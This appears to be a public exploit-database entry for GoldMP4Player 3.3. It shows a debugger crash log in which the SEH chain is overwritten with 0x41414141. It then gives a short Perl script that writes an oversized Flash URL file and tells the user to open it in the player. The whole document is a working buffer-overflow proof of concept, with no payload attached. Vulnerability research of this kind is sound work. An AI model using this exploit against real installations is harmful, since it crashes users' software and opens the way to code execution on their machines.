#---------------------------------------------------------------------------------## Exploit Title: GoldMP4Player 3.3 - Buffer Overflow PoC (SEH)## Date: Feb 25 2014 ## Exploit Author: Gabor Seljan## Software Link: http://download.cnet.com/GoldMP4Player/3000-2139_4-10967424.html ## Version: 3.3## Tested on: Windows XP SP3 ##---------------------------------------------------------------------------------## (cb4.cb0): Access violation - code c0000005 (first chance)# First chance exceptions are reported before any exception handling.# This exception may be expected and handled.# eax=05506f41 ebx=00000111 ecx=05503ff1 edx=00130000 esi=05506fe0 edi=00000003# eip=0041a0c3 esp=0012e25c ebp=054f4f88 iopl=0 nv up ei pl nz na po nc# cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010202# *** WARNING: Unable to verify checksum for image00400000# *** ERROR: Module load completed but symbols could not be loaded for image00400000# image00400000+0x1a0c3:# 0041a0c3 8802mov byte ptr [edx],alds:0023:00130000=41# 0:000> !exchain# 0012e270: image00400000+4c1b3 (0044c1b3)# 0012e3b0: image00400000+4c56a (0044c56a)# 0012e430: image00400000+4c4ec (0044c4ec)# 0012e4e0: *** ERROR: Symbol file could not be found.# 0012e534: USER32!DeregisterShellHookWindow+1cf (7e44048f)# 0012e748: USER32!DeregisterShellHookWindow+1cf (7e44048f)# 0012e7a8: USER32!DeregisterShellHookWindow+1cf (7e44048f)# 0012e8cc: image00400000+4c333 (0044c333)# 0012e9f4: <Unloaded_ION.dll>+41414140 (41414141)# Invalid exception stack at 41414141#!/usr/bin/perl
use strict;
use warnings;
my $filename = "poc.txt";
my $junk = "A" x 10000;
open(FILE,">$filename")|| die "[-]Error:\n$!\n";
print FILE "http://$junk.swf";
close(FILE);
print "Exploit file created successfully [$filename]!\n";
print "Now open the URL in $filename via File -> Open Flash URL\n";
